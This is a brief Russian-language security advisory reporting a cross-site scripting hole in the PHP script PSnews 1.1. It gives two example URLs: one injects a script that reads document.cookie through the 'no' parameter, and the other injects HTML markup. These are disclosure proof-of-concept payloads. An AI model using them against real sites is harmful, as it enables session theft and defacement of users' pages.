Программа: PSnews 1.1 

Удаленный пользователь может выполнить XSS нападение. 

Пример: 

http://[target]/index.php?function=show_all&no=
%253cscript>alert%2528document.cookie); %253c/script>

http://[target]/index.php?function=add_kom&no= ">%20<font%20size="20"%20color=red>%2
0<b>%20WackY%20%20</font>



Оставить мнение